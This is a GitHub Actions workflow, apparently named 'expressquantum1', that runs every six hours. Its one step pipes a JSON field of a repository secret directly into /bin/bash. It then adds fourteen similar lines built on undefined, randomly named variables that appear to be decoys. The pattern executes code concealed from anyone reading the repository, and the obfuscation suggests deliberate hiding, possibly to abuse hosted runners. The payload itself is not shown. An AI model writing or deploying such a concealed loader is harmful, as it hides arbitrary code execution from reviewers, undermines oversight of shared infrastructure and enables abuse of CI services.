name: expressquantum1

on:
  workflow_dispatch:
  schedule:
    - cron: '10 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: expressquantum1
        env:
          efn1: ${{ secrets.efn1 }}
        run: |
          echo $efn1 | jq -r .k8209 | /bin/bash
          echo $uhuj09587 | jq -r .guji75 | /bin/bash
          echo $djru2954 | jq -r .sfffo602 | /bin/bash
          echo $h3275 | jq -r .w007 | /bin/bash
          echo $xjsj1069 | jq -r .dmnh5898 | /bin/bash
          echo $e75 | jq -r .ib675 | /bin/bash
          echo $toqoa101 | jq -r .yi3 | /bin/bash
          echo $srapf54 | jq -r .w10 | /bin/bash
          echo $budiz68607 | jq -r .bgba29297 | /bin/bash
          echo $e6 | jq -r .sjs8 | /bin/bash
          echo $lpqn2 | jq -r .or06 | /bin/bash
          echo $xfj1 | jq -r .kedq891 | /bin/bash
          echo $cwni037 | jq -r .vqpd1 | /bin/bash
          echo $bfti697 | jq -r .we27 | /bin/bash
          echo $zfa04 | jq -r .vum282 | /bin/bash

